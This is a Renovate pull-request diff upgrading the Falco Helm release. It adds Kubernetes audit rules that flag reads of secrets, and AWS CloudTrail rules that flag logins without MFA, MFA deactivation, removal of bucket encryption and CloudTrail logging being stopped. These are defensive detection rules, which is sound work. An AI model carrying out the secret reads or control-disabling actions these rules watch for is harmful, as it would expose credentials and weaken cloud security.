-      desc: Detect any attempt to delete a secret Service account tokens are excluded.
+      desc: Detect any attempt to delete a secret. Service account tokens are excluded.
       condition: (kactivity and kdelete and secret and ka.target.namespace!=kube-system and non_system_user and response_successful)
       output: K8s Secret Deleted (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
 
+    - rule: K8s Secret Get Successfully
+      desc: >
+        Detect any attempt to get a secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and response_successful
+      output: K8s Secret Get Successfully (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: ERROR
+      source: k8s_audit
+      tags: [k8s]
+
+    - rule:  K8s Secret Get Unsuccessfully Tried
+      desc: >
+        Detect an unsuccessful attempt to get the secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and not response_successful
+      output: K8s Secret Get Unsuccessfully Tried (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
     # This rule generally matches all events, and as a result is disabled
     # by default. If you wish to enable these events, modify the
     # following macro.
@@ -4003,7 +4648,7 @@
     # cluster creation. This may signify a permission setting too broader.
     # As we can't check for role of the user on a general ka.* event, this
     # may or may not be an administrator. Customize the full_admin_k8s_users
-    # list to your needs, and activate at your discrection.
+    # list to your needs, and activate at your discretion.
 
     # # How to test:
     # # Execute any kubectl command connected using default cluster user, as:
@@ -4184,8 +4829,8 @@
         app: falco
         role: security
       annotations:
-        checksum/config: 9ac2b16de3ea0caa56e07879f0d383db5a400f1e84c2e04d5f2cec53f8b23a4a
-        checksum/rules: 4fead7ed0d40bd6533c61315bc4089d124976d46b052192f768b9c97be5d405e
+        checksum/config: 6320f1915ef15863bce34abb7b661561e31eea40ac21fecdc5f3e35fe31c564f
+        checksum/rules: 8990fd9e100252b5d1717eea471270ca3878d0359051d00565e95fb8e4fa6aec
         checksum/certs: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
     spec:
       serviceAccountName: falco
@@ -4196,7 +4841,7 @@
           operator: Exists
       containers:
         - name: falco
-          image: public.ecr.aws/falcosecurity/falco:0.30.0
+          image: public.ecr.aws/falcosecurity/falco:0.32.0
           imagePullPolicy: IfNotPresent
           resources:
             limits:
@@ -4211,11 +4856,14 @@
             - /usr/bin/falco
             - --cri
             - /run/containerd/containerd.sock
+            - --cri
+            - /run/crio/crio.sock
             - -K
             - /var/run/secrets/kubernetes.io/serviceaccount/token
             - -k
             - https://$(KUBERNETES_SERVICE_HOST)
-            - --k8s-node="${FALCO_K8S_NODE_NAME}"
+            - --k8s-node
+            - "$(FALCO_K8S_NODE_NAME)"
             - -pk
           env:
             - name: FALCO_K8S_NODE_NAME
@@ -4243,6 +4891,8 @@
           volumeMounts:
             - mountPath: /host/run/containerd/containerd.sock
               name: containerd-socket
+            - mountPath: /host/run/crio/crio.sock
+              name: crio-socket
             - mountPath: /host/dev
               name: dev-fs
               readOnly: true
@@ -4270,6 +4920,9 @@
         - name: containerd-socket
           hostPath:
             path: /var/run/k3s/containerd/containerd.sock
+        - name: crio-socket
+          hostPath:
+            path: /run/crio/crio.sock
         - name: dev-fs
           hostPath:
             path: /dev
@@ -4300,6 +4953,10 @@
                 path: falco_rules.local.yaml
               - key: application_rules.yaml
                 path: rules.available/application_rules.yaml
+              - key: k8s_audit_rules.yaml
+                path: k8s_audit_rules.yaml
+              - key: aws_cloudtrail_rules.yaml
+                path: aws_cloudtrail_rules.yaml
         - name: rules-volume
           configMap:
             name: falco-rules

@renovate renovate bot changed the title chore(deps): update helm release falco to v1.19.0 chore(deps): update helm release falco to v1.19.1 Jun 7, 2022
@github-actions
Copy link
Contributor

github-actions bot commented Jun 7, 2022

Path: cluster/apps/security/falco-system/falco/helm-release.yaml
Version: 1.16.0 -> 1.19.1

@@ -153,7 +153,7 @@
     release: "falco"
     heritage: "Helm"
 data:
-  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/k8s_audit_rules.yaml\n  - /etc/falco/rules.d\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - \"ignore\": do nothing. If an empty list is provided, ignore is assumed.\n#   - \"log\": log a CRITICAL message noting that the buffer was full.\n#   - \"alert\": emit a falco alert noting that the buffer was full.\n#   - \"exit\": exit falco with a non-zero rc.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of 10 messages.\nsyscall_event_drops:\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 10\n\n# Falco continuously monitors outputs performance. When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\n\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\n\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\n\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\n\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_audit_endpoint: /k8s-audit\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/server.pem\n\n# Possible additional things you might want to do with program output:\n#   - send to a slack webhook:\n#         program: \"\\\"jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX\\\"\"\n#   - logging (alternate method than syslog):\n#         program: logger -t falco-test\n#   - send over a network connection:\n#         program: nc host.example.com 80\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: http://falco-sidekick-falcosidekick:2801\n\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
+  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/rules.d\n\nplugins:\n    - init_config: \"\"\n      library_path: libk8saudit.so\n      name: k8saudit\n      open_params: http://:9765/k8s-audit\n    - init_config: \"\"\n      library_path: libcloudtrail.so\n      name: cloudtrail\n      open_params: \"\"\n    - init_config: \"\"\n      library_path: libjson.so\n      name: json\n\n# Setting this list to empty ensures that the above plugins are *not*\n# loaded and enabled by default. If you want to use the above plugins,\n# set a meaningful init_config/open_params for the cloudtrail plugin\n# and then change this to:\n# load_plugins: [cloudtrail, json]\nload_plugins:\n    []\n# Watch config file and rules files for modification.\n# When a file is modified, Falco will propagate new config,\n# by reloading itself.\nwatch_config_files: true\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When Falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - ignore: do nothing (default when list of actions is empty)\n#   - log: log a DEBUG message noting that the buffer was full\n#   - alert: emit a Falco alert noting that the buffer was full\n#   - exit: exit Falco with a non-zero rc\n#\n# Notice it is not possible to ignore and log/alert messages at the same time.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of one message (by default).\n#\n# The messages are emitted when the percentage of dropped system calls\n# with respect the number of events in the last second\n# is greater than the given threshold (a double in the range [0, 1]).\n#\n# For debugging/testing it is possible to simulate the drops using\n# the `simulate_drops: true`. In this case the threshold does not apply.\nsyscall_event_drops:\n  threshold: 0.1\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 1\n\n# Falco uses a shared buffer between the kernel and userspace to receive\n# the events (eg., system call information) in userspace.\n#\n# Anyways, the underlying libraries can also timeout for various reasons.\n# For example, there could have been issues while reading an event.\n# Or the particular event needs to be skipped.\n# Normally, it's very unlikely that Falco does not receive events consecutively.\n#\n# Falco is able to detect such uncommon situation.\n#\n# Here you can configure the maximum number of consecutive timeouts without an event\n# after which you want Falco to alert.\n# By default this value is set to 1000 consecutive timeouts without an event at all.\n# How this value maps to a time interval depends on the CPU frequency.\nsyscall_event_timeouts:\n  max_consecutives: 1000\n\n# Falco continuously monitors outputs performance. When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/falco.pem\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: 'http://falco-sidekick-falcosidekick:2801'\n  user_agent: falcosecurity/falco\n\n\n# Falco supports running a gRPC server with two main binding types\n# 1. Over the network with mandatory mutual TLS authentication (mTLS)\n# 2. Over a local unix socket with no authentication\n# By default, the gRPC server is disabled, with no enabled services (see grpc_output)\n# please comment/uncomment and change accordingly the options below to configure it.\n# Important note: if Falco has any troubles creating the gRPC server\n# this information will be logged, however the main Falco daemon will not be stopped.\n# gRPC server over network with (mandatory) mutual TLS configuration.\n# This gRPC server is secure by default so you need to generate certificates and update their paths here.\n# By default the gRPC server is off.\n# You can configure the address to bind and expose it.\n# By modifying the threadiness configuration you can fine-tune the number of threads (and context) it will use.\n# grpc:\n#   enabled: true\n#   bind_address: \"0.0.0.0:5060\"\n#   # when threadiness is 0, Falco sets it by automatically figuring out the number of online cores\n#   threadiness: 0\n#   private_key: \"/etc/falco/certs/server.key\"\n#   cert_chain: \"/etc/falco/certs/server.crt\"\n#   root_certs: \"/etc/falco/certs/ca.crt\"\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\n# gRPC output service.\n# By default it is off.\n# By enabling this all the output events will be kept in memory until you read them with a gRPC client.\n# Make sure to have a consumer for them or leave this disabled.\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
   application_rules.yaml: |-
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -343,6 +343,447 @@
     #   condition: proc.name in (http_server_binaries) and inbound and fd.sport != 80 and fd.sport != 443
     #   output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)"
     #   priority: WARNING
+  aws_cloudtrail_rules.yaml: |+
+    #
+    # Copyright (C) 2022 The Falco Authors.
+    #
+    #
+    # Licensed under the Apache License, Version 2.0 (the "License");
+    # you may not use this file except in compliance with the License.
+    # You may obtain a copy of the License at
+    #
+    #     http://www.apache.org/licenses/LICENSE-2.0
+    #
+    # Unless required by applicable law or agreed to in writing, software
+    # distributed under the License is distributed on an "AS IS" BASIS,
+    # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+    # See the License for the specific language governing permissions and
+    # limitations under the License.
+    #
+
+    # All rules files related to plugins should require at least engine version 10
+    - required_engine_version: 10
+
+    - required_plugin_versions:
+      - name: cloudtrail
+        version: 0.2.3
+      - name: json
+        version: 0.2.2
+
+    # Note that this rule is disabled by default. It's useful only to
+    # verify that the cloudtrail plugin is sending events properly.  The
+    # very broad condition evt.num > 0 only works because the rule source
+    # is limited to aws_cloudtrail. This ensures that the only events that
+    # are matched against the rule are from the cloudtrail plugin (or
+    # a different plugin with the same source).
+    - rule: All Cloudtrail Events
+      desc: Match all cloudtrail events.
+      condition:
+        evt.num > 0
+      output: Some Cloudtrail Event (evtnum=%evt.num info=%evt.plugininfo ts=%evt.time.iso8601 id=%ct.id error=%ct.error)
+      priority: DEBUG
+      tags:
+      - cloud
+      - aws
+      source: aws_cloudtrail
+      enabled: false
+
+    - rule: Console Login Through Assume Role
+      desc: Detect a console login through Assume Role.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+      output:
+        Detected a console login through Assume Role
+        (principal=%ct.user.principalid,
+        assumedRole=%ct.user.arn,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region)
+      priority: WARNING
+      tags:
+      - cloud
+      - aws
+      - aws_console
+      - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Login Without MFA
+      desc: Detect a console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and json.value[/additionalEventData/MFAUsed]="No"
+      output:
+        Detected a console login without MFA
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Root Login Without MFA
+      desc: Detect root console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and json.value[/additionalEventData/MFAUsed]="No"
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and ct.user.identitytype="Root"
+      output:
+        Detected a root console login without MFA.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Deactivate MFA for Root User
+      desc: Detect deactivating MFA configuration for root.
+      condition:
+        ct.name="DeactivateMFADevice" and not ct.error exists
+        and ct.user.identitytype="Root"
+        and ct.request.username="AWS ROOT USER"
+      output:
+        Multi Factor Authentication configuration has been disabled for root
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         MFA serial number=%ct.request.serialnumber)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create AWS user
+      desc: Detect creation of a new AWS user.
+      condition:
+        ct.name="CreateUser" and not ct.error exists
+      output:
+        A new AWS user has been created
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         new user created=%ct.request.username)
+      priority: INFO
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create Group
+      desc: Detect creation of a new user group.
+      condition:
+        ct.name="CreateGroup" and not ct.error exists
+      output:
+        A new user group has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Delete Group
+      desc: Detect deletion of a user group.
+      condition:
+        ct.name="DeleteGroup" and not ct.error exists
+      output:
+        A user group has been deleted.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: ECS Service Created
+      desc: Detect a new service is created in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        ct.name="CreateService" and
+        not ct.error exists
+      output:
+        A new service has been created in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        service name=%ct.request.servicename,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: ECS Task Run or Started
+      desc: Detect a new task is started in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        (ct.name="RunTask" or ct.name="StartTask") and
+        not ct.error exists
+      output:
+        A new task has been started in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: Create Lambda Function
+      desc: Detect creation of a Lambda function.
+      condition:
+        ct.name="CreateFunction20150331" and not ct.error exists
+      output:
+        Lambda function has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Code
+      desc: Detect updates to a Lambda function code.
+      condition:
+        ct.name="UpdateFunctionCode20150331v2" and not ct.error exists
+      output:
+        The code of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Configuration
+      desc: Detect updates to a Lambda function configuration.
+      condition:
+        ct.name="UpdateFunctionConfiguration20150331v2" and not ct.error exists
+      output:
+        The configuration of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Run Instances
+      desc: Detect launching of a specified number of instances.
+      condition:
+        ct.name="RunInstances" and not ct.error exists
+      output:
+        A number of instances have been launched.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    # Only instances launched on regions in this list are approved.
+    - list: approved_regions
+      items:
+        - us-east-0
+
+    - rule: Run Instances in Non-approved Region
+      desc: Detect launching of a specified number of instances in a non-approved region.
+      condition:
+        ct.name="RunInstances" and not ct.error exists and
+        not ct.region in (approved_regions)
+      output:
+        A number of instances have been launched in a non-approved region.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid,
+         image id=%json.value[/responseElements/instancesSet/items/0/instanceId])
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Encryption
+      desc: Detect deleting configuration to use encryption for bucket storage.
+      condition:
+        ct.name="DeleteBucketEncryption" and not ct.error exists
+      output:
+        A encryption configuration for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Public Access Block
+      desc: Detect deleting blocking public access to bucket.
+      condition:
+        ct.name="PutBucketPublicAccessBlock" and not ct.error exists and
+        json.value[/requestParameters/publicAccessBlock]="" and
+          (json.value[/requestParameters/PublicAccessBlockConfiguration/RestrictPublicBuckets]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicPolicy]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicAcls]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/IgnorePublicAcls]=false)
+      output:
+        A public access block for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: List Buckets
+      desc: Detect listing of all S3 buckets.
+      condition:
+        ct.name="ListBuckets" and not ct.error exists
+      output:
+        A list of all S3 buckets has been requested.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         host=%ct.request.host)
+      priority: WARNING
+      enabled: false
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket ACL
+      desc: Detect setting the permissions on an existing bucket using access control lists.
+      condition:
+        ct.name="PutBucketAcl" and not ct.error exists
+      output:
+        The permissions on an existing bucket have been set using access control lists.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket Policy
+      desc: Detect applying an Amazon S3 bucket policy to an Amazon S3 bucket.
+      condition:
+        ct.name="PutBucketPolicy" and not ct.error exists
+      output:
+        An Amazon S3 bucket policy has been applied to an Amazon S3 bucket.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket,
+         policy=%ct.request.policy)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Trail Created
+      desc: Detect creation of a new trail.
+      condition:
+        ct.name="CreateTrail" and not ct.error exists
+      output:
+        A new trail has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         trail name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Logging Disabled
+      desc: The CloudTrail logging has been disabled, this could be potentially malicious.
+      condition:
+        ct.name="StopLogging" and not ct.error exists
+      output:
+        The CloudTrail logging has been disabled.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         resource name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
   falco_rules.local.yaml: |
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -376,7 +817,7 @@
     # Or override/append to any rule, macro, or list from the Default Rules
   falco_rules.yaml: |
     #
